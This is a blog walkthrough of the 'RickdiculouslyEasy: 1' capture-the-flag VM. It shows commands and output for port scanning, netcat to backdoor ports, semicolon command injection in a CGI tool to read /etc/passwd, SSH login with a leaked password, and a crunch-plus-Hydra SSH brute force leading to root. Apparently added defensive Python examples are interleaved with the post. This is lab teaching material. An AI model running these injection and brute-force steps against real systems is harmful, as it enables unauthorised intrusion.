Thursday, October 5, 2017

RickdiculouslyEasy: 1 - Walkthrough

It has been a long time since I last posted anything from Vulnhub. To be honest, I just haven't had much time to dive into any of these VMs. However, g0tmi1k released a ton of new VMs, so I wanted to check them out. One of them was RickdiculouslyEasy: 1, made by Luke.

This VM is based on the TV show Rick and Morty. I am a fan of the show myself, so I had to check it out. It turned out to be quite easy, but I still had fun solving it. Below is my walkthrough on capturing all of the flags.




We start out running a discovery scan and find our VM:


 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                         
                                                                                                                                                       
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                       
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor                                                                                      
 192.168.56.100  08:00:27:89:f9:13      1      60  PCS Systemtechnik GmbH                                                                              
 192.168.56.102  08:00:27:bf:52:95      1      60  PCS Systemtechnik GmbH 

We find our target: 192.168.56.102. We then run an Nmap scan and note the open ports and services:


eric@linux:~$ nmap 192.168.56.102 -p21,22,80,9090,13337,22222,60000 -sV

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-05 08:08 CDT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for localhost.localdomain (192.168.56.102)
Host is up (0.00044s latency).

PORT      STATE SERVICE    VERSION
21/tcp    open  ftp        vsftpd 3.0.3
22/tcp    open  tcpwrapped
80/tcp    open  http       Apache httpd 2.4.27 ((Fedora))
9090/tcp  open  http       Cockpit web service
13337/tcp open  tcpwrapped
22222/tcp open  ssh        OpenSSH 7.5 (protocol 2.0)
60000/tcp open  tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.43 seconds
eric@linux:~$ 

We begin with the low-hanging fruit and capture a few flags.

We notice that the FTP service allows anonymous login. Upon logging in, we see the flag. We pull it down with get and cat the contents:

eric@linux:~$ ftp 192.168.56.102
Connected to 192.168.56.102.
220 (vsFTPd 3.0.3)
Name (192.168.56.102:eric): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (15.4484 kB/s)
ftp> quit
221 Goodbye.
eric@linux:~$ cat FLAG.txt 
FLAG{Whoa this is unexpected} - 10 Points
eric@linux:~$

Flag 1 is found. 10/130 points total:


FLAG{Whoa this is unexpected} - 10 Points

We then connect to port 60000 and are greeted with "Ricks half baked reverse shell...". Once connected, only a minimal set of commands is available. However, ls and cat work, which lets us find the flag and view its contents:


eric@linux:~$ nc -nv 192.168.56.102 60000
(UNKNOWN) [192.168.56.102] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt
FLAG{Flip the pickle Morty!} - 10 Points 
# quit
quit: command not found 
# ^C
eric@linux:~$ 

Flag 2 is found. 20/130 points total:



FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points

Next we move to port 13337. When connected, we are quickly prompted with the next flag.


eric@linux:~$ nc -nv 192.168.56.102 13337
(UNKNOWN) [192.168.56.102] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
eric@linux:~$ 

Flag 3 is found. 30/130 points total:


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points

Next, we check out port 9090. Upon navigating to the page, we see our next flag:



Flag 4 is found. 40/130 points total.


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points


We then move on to port 80. We run DIRB against it and encounter a few directories that seem interesting:


eric@linux:~$ dirb http://192.168.56.102

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct  5 08:25:56 2017
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/ (CODE:403|SIZE:217)                                                                                                   
+ http://192.168.56.102/index.html (CODE:200|SIZE:326)                                                                                                 
==> DIRECTORY: http://192.168.56.102/passwords/                                                                                                        
+ http://192.168.56.102/robots.txt (CODE:200|SIZE:126)                                                                                                 
                                                                                                                                                       
---- Entering directory: http://192.168.56.102/passwords/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu Oct  5 08:25:58 2017
DOWNLOADED: 4612 - FOUND: 3
eric@linux:~$ 


Specifically, /cgi-bin/, /passwords/ and /robots.txt seem interesting. We begin with the /passwords/ directory and notice a FLAG.txt inside.

Flag 5 is found. 50/130 total points.





FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points


Next, going back to the /passwords/ directory and viewing the source of passwords.html, we notice a comment that says <!--Password: winter-->. We keep this in our pocket for later enumeration.



We then check /robots.txt and see two scripts listed within the /cgi-bin/ directory: root_shell.cgi and tracertool.cgi.



Accessing /cgi-bin/tracertool.cgi, we see Morty's Machine Tracer Machine:


Upon enumeration, we notice that a semicolon ";" lets us chain our own command onto the one the tool runs, giving command execution. To confirm, I run id, whoami, pwd and a few other simple commands:



And the response is as expected:



I was unsuccessful in gaining a shell with this RCE. I did notice that "cat" was not allowed. However, running "more" against "/etc/passwd" worked, and the output showed that "Summer" was an active user:
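The tracertool.cgi behaviour described above (a semicolon ends the intended command and starts another, and a blocked "cat" is sidestepped with "more") is the textbook shell command injection pattern. The following is an added example, not the VM's CGI code, which I have not seen: a hypothetical Python tracer that builds its command unsafely, the kind of command denylist a "no cat" filter implies, and the hardened form that allowlists the host argument and passes an argv list with no shell. The host regex, the denylist and the sample inputs are my own constructions.

```python
import re
import subprocess

# Constructed sample inputs (not taken from the VM): a legitimate target and
# two payload shapes of the kind the walkthrough demonstrates.
SAMPLE_INPUTS = ["192.168.56.1", "example.com", "8.8.8.8; more /etc/passwd", "$(id)"]

# Hypothetical denylist of the kind a "cat is not allowed" filter implies.
DENYLIST = ("cat",)

# Allowlist for the one thing a tracer needs: an IPv4 address or a hostname.
# Spaces, ';', '$', '|' and backticks simply fail to match, so no list of
# forbidden characters or commands has to be maintained.
_OCTET = r"(?:25[0-5]|2[0-4]\d|1?\d?\d)"
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(rf"^(?:{_OCTET}(?:\.{_OCTET}){{3}}|(?:{_LABEL}\.)*{_LABEL})$")


def build_unsafe(host):
    """Vulnerable pattern: splice user input into a single shell string.
    Run with shell=True, a ';' in host terminates the traceroute command and
    whatever follows runs as a second command. Returned here, never executed."""
    return "traceroute " + host


def denylisted(host):
    """A command denylist only blocks the words it knows about; 'more' is
    not 'cat', so the filter passes the request straight through."""
    return any(word in host.split() for word in DENYLIST)


def is_valid_host(host):
    return len(host) <= 253 and HOST_RE.match(host) is not None


def build_safe(host):
    """Hardened pattern: reject anything that is not a host, then hand an
    argv list to the OS so the value can only ever be a single argument."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host argument: {host!r}")
    return ["traceroute", host]


def safe_rejects(host):
    """True when the hardened builder refuses the input."""
    try:
        build_safe(host)
    except ValueError:
        return True
    return False


def run_trace(host):
    """Only reaches the OS with a validated argv list and no shell."""
    return subprocess.run(build_safe(host), capture_output=True, text=True, timeout=60).stdout


if __name__ == "__main__":
    for sample in SAMPLE_INPUTS:
        print(f"{sample!r:32} denylist blocks: {denylisted(sample)!s:5} "
              f"allowlist accepts: {is_valid_host(sample)}")
```

The lesson the page's "cat" versus "more" observation teaches is built into the design: filtering known-bad commands is a losing race, while validating the one parameter the program actually needs and never invoking a shell removes the injection class entirely.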


Output below:


Remembering the password "winter" found earlier, I decided to try SSH on port 22222 as Summer with that password:


eric@linux:~$ ssh Summer@192.168.56.102 -p 22222
Summer@192.168.56.102's password: 
Last login: Wed Oct  4 15:31:17 2017
[Summer@localhost ~]$ whoami
Summer
[Summer@localhost ~]$ 

Success. Now that I have remote access, I did some enumeration and found another flag inside Summer's home directory:


[Summer@localhost ~]$ pwd
/home/Summer
[Summer@localhost ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@localhost ~]$ 


Flag 6 found. 60/130 total points.


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points

Further enumeration turned up two files in Morty's home directory. I copied them over to Summer's directory and then SCP'd them to my local host:


[Summer@localhost ~]$ ls ../Morty/
journal.txt.zip  Safe_Password.jpg
[Summer@localhost ~]$ cp ../Morty/journal.txt.zip ~
[Summer@localhost ~]$ cp ../Morty/Safe_Password.jpg ~
[Summer@localhost ~]$ ^C
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:journal.txt.zip ~
Summer@192.168.56.102's password: 
journal.txt.zip                                                                                                       100%  414   483.9KB/s   00:00    
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:Safe_Password.jpg ~
Summer@192.168.56.102's password: 
Safe_Password.jpg                                                                                                     100%   42KB  17.5MB/s   00:00    
eric@linux:~$ ls
burp-hash.sqlite  Documents  FLAG.txt         Music     Public             Templates  vulnhub-rickdiculous
Desktop           Downloads  journal.txt.zip  Pictures  Safe_Password.jpg  Videos
eric@linux:~$

With both files saved locally, I noticed that journal.txt.zip was password-protected. I tried viewing the JPG and it was just a picture of Rick. I then ran strings against the file and found the password:
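What strings(1) is doing here is worth seeing in code: it scans the raw bytes for runs of printable ASCII, which is why text tucked into a JPEG's comment or metadata segments surfaces even though the image itself renders normally. The following is an added Python example, not the page's own tooling, run over a constructed byte blob (not Safe_Password.jpg): it recreates the scan and then narrows the output to credential-like strings, the triage step a forensic analyst, or a review of assets before they ship, would apply.

```python
import re

# Constructed byte blob (not the page's Safe_Password.jpg): a JPEG SOI/APP0
# header, a fake comment-like segment, some binary noise, and an embedded
# hint string, followed by an EOI marker.
SAMPLE_BLOB = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\xff\xfe\x00\x1aAuthor: constructed sample"
    b"\x13\x7f\x00\x02\x91\xa3"
    b"Hint: example-passphrase"
    b"\xff\xd9"
)


def extract_strings(data, min_len=4):
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)
    with -n. Bytes 0x20..0x7e are printable; anything else breaks a run."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_candidates(data, keywords=("pass", "hint", "key", "secret")):
    """Narrow the strings output to runs that mention credential-like words."""
    return [s for s in extract_strings(data) if any(k in s.lower() for k in keywords)]


if __name__ == "__main__":
    for s in extract_strings(SAMPLE_BLOB):
        print(s)
    print("candidates:", find_candidates(SAMPLE_BLOB))
```

The same scan is a cheap control on the defensive side: running it over images and documents before they are published catches exactly the kind of embedded secret the walkthrough finds.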




I then tried the password "Meeseek" on the zip file and it opened successfully. The contents were a message and another flag:


eric@linux:~$ unzip journal.txt.zip 
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: journal.txt             
eric@linux:~$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
eric@linux:~$ 

Flag 7 found. 80/130 total points, only 50 to go!


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 


Given the journal entry about a drunk Rick mumbling about a safe and a password, the flag value "131333" looked like the password to a safe. I also noticed a RICKS_SAFE directory inside Rick's home directory, containing an executable called "safe". So I copied "safe" to Summer's home directory and SCP'd it locally. I then ran the executable with the password "131333" and successfully opened the safe:



[Summer@localhost ~]$ ls ../RickSanchez/
RICKS_SAFE  ThisDoesntContainAnyFlags
[Summer@localhost ~]$ ls ../RickSanchez/RICKS_SAFE/
safe
[Summer@localhost ~]$ cp ../RickSanchez/RICKS_SAFE/safe ~
[Summer@localhost ~]$ exit
logout
Connection to 192.168.56.102 closed.
eric@linux:~$ scp -P 22222 Summer@192.168.56.102:safe ~
Summer@192.168.56.102's password: 
safe                                                                                                                  100% 8704     6.1MB/s   00:00    
eric@linux:~$ ./safe 131333
decrypt:  FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.� @
eric@linux:~$ 

Flag 8 found. 100/130 total points:

FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points




The contents of Rick's safe also tell us that, in case he forgets his password, it follows this pattern: 1 uppercase character, 1 digit and one of the words in his old band's name. He also mentions that "sudo is wheely good".



Knowing that Rick Sanchez's old band, with Birdperson and Squanchy, was called "The Flesh Curtains", I decided to use "crunch" to generate a password list of 1 uppercase character, 1 digit and an ending of either "Flesh" or "Curtains".



eric@linux:~$ crunch 10 10 -t ,%Curtains -o ./wordlist.curtains
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
eric@linux:~$ crunch 7 7 -t ,%Flesh -o ./wordlist.flesh
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
eric@linux:~$ cat wordlist.curtains > wordlist
eric@linux:~$ cat wordlist.flesh >> wordlist
eric@linux:~$ wc -l wordlist
520 wordlist
eric@linux:~$ 
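Here is the arithmetic behind the two crunch runs above, as an added Python example (not the page's own code): it implements the crunch -t placeholders these templates use (',' for one uppercase letter, '%' for one digit; any other character is literal), expands the two templates to the 520 candidates the wc -l output reports, and puts that keyspace in bits next to an unconstrained 10-character alphanumeric password. It shows why a written-down hint like Rick's collapses the search from roughly 60 bits to roughly 9 bits. The template list is constructed from the hint on the page.

```python
import itertools
import math
import string

# crunch -t placeholders implemented here. crunch also defines '@' (lowercase)
# and '^' (symbols), which these templates do not use.
PLACEHOLDERS = {",": string.ascii_uppercase, "%": string.digits}

# Constructed from the hint on the page: one uppercase, one digit, a band word.
TEMPLATES = [",%Curtains", ",%Flesh"]


def expand_template(template):
    """Every string the template describes: a placeholder expands to its
    character set, every other character stands for itself."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in template]
    return ["".join(combo) for combo in itertools.product(*pools)]


def keyspace(templates):
    """Union of all candidates across the templates (crunch output concatenated)."""
    words = []
    for template in templates:
        words.extend(expand_template(template))
    return words


def bits(n):
    """Guessing entropy of a uniformly chosen element of an n-element set."""
    return math.log2(n)


def compare_to_unconstrained(length=10):
    """Bits for the hinted space versus `length` characters over [A-Za-z0-9]."""
    hinted = len(keyspace(TEMPLATES))
    full = (len(string.ascii_letters) + len(string.digits)) ** length
    return round(bits(hinted), 2), round(bits(full), 2)


if __name__ == "__main__":
    words = keyspace(TEMPLATES)
    hinted_bits, full_bits = compare_to_unconstrained()
    print(f"{len(words)} candidates, {hinted_bits} bits vs {full_bits} bits unconstrained")
```

The numbers are the policy argument in miniature: the "1 uppercase, 1 digit" rule adds structure, not strength, once the dictionary word and the position of each class are known.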

With my password list generated, I then use Hydra to brute-force the RickSanchez account over SSH and find the correct password:


eric@linux:~$ hydra -l RickSanchez -P wordlist ssh://192.168.56.102 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-05 09:19:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 520 login tries (l:1/p:520), ~33 tries per task
[DATA] attacking ssh://192.168.56.102:22222/
[22222][ssh] host: 192.168.56.102   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-05 09:19:39
eric@linux:~$ 

With the correct password, P7Curtains, I SSH into the box as Rick. I then sudo to root, per Rick's hint, and read the final flag:


eric@linux:~$ ssh RickSanchez@192.168.56.102 -p 22222
RickSanchez@192.168.56.102's password: 
Last failed login: Fri Oct  6 01:19:39 AEDT 2017 from 192.168.56.101 on ssh:notty
There were 176 failed login attempts since the last successful login.
Last login: Wed Oct  4 15:46:42 2017
[RickSanchez@localhost ~]$ sudo -i
[sudo] password for RickSanchez: 
[root@localhost ~]# more FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@localhost ~]# 
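The login banner above records the other side of the Hydra run: "176 failed login attempts since the last successful login" is exactly the trail sshd leaves in the auth log. As an added example (not from the page), here is a small Python detector run over constructed sshd log lines in syslog format. It groups "Failed password" events per source address, flags a burst above a threshold inside a time window, and escalates when the same source then gets an "Accepted password", which is the case a defender most needs paged on. The thresholds, the host name and the sample lines are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines in syslog format (not from the page's VM). They
# model a password-guessing burst followed by one success, plus an unrelated
# single failure from another host.
SAMPLE_LOG = """\
Oct  5 09:19:10 localhost sshd[2231]: Failed password for RickSanchez from 192.168.56.101 port 51234 ssh2
Oct  5 09:19:10 localhost sshd[2232]: Failed password for RickSanchez from 192.168.56.101 port 51236 ssh2
Oct  5 09:19:11 localhost sshd[2233]: Failed password for RickSanchez from 192.168.56.101 port 51238 ssh2
Oct  5 09:19:11 localhost sshd[2234]: Failed password for RickSanchez from 192.168.56.101 port 51240 ssh2
Oct  5 09:19:12 localhost sshd[2235]: Failed password for RickSanchez from 192.168.56.101 port 51242 ssh2
Oct  5 09:19:12 localhost sshd[2236]: Failed password for RickSanchez from 192.168.56.101 port 51244 ssh2
Oct  5 09:19:39 localhost sshd[2310]: Accepted password for RickSanchez from 192.168.56.101 port 51300 ssh2
Oct  5 09:30:02 localhost sshd[2400]: Failed password for Summer from 192.168.56.50 port 40000 ssh2
Oct  5 09:31:15 localhost sshd[2401]: Accepted password for Summer from 192.168.56.50 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)


def parse_events(text, year=2017):
    """Turn auth log lines into (timestamp, result, user, source) tuples.
    Syslog timestamps carry no year, so one is supplied for the comparisons."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["result"], m["user"], m["src"]))
    return events


def detect_bruteforce(events, threshold=5, window_s=60):
    """Flag a source with >= threshold failures inside window_s seconds, and
    escalate if that source later authenticates successfully."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, result, _user, src in sorted(events):
        (failures if result == "Failed" else successes)[src].append(ts)

    alerts = {}
    for src, times in failures.items():
        start = 0
        for end, t_end in enumerate(times):
            # Slide the window start forward until it spans at most window_s.
            while (t_end - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                later_success = any(t >= t_end for t in successes.get(src, []))
                alerts[src] = "brute-force success" if later_success else "brute-force attempt"
                break
    return alerts


if __name__ == "__main__":
    for src, verdict in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(f"{src}: {verdict}")
```

This is the same signal tools such as fail2ban act on; the point of writing it out is to see that the decisive field is failures-then-success from one source, not the raw failure count.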

Flag 9 found. 130/130 total points:


FLAG{Whoa this is unexpected} - 10 Points
FLAG{Flip the pickle Morty!} - 10 Points
FLAG:{TheyFoundMyBackDoorMorty}-10Points
FLAG {There is no Zeus, in your face!} - 10 Points
FLAG{Yeah d- just don't do it.} - 10 Points
FLAG{Get off the high road Summer!} - 10 Points
FLAG: {131333} - 20 Points 
FLAG{And Awwwaaaaayyyy we Go!} - 20 Points
FLAG: {Ionic Defibrillator} - 30 points



This was a simple VM, but I still had fun working on it. I enjoyed the theme, being a Rick and Morty fan. I feel this VM provides a great introduction to pen testing and to using a few common hacking tools to enumerate and accomplish certain tasks.

Thanks to Luke for making a fun VM and to Vulnhub for hosting these great VMs.

Until next time!

geoda
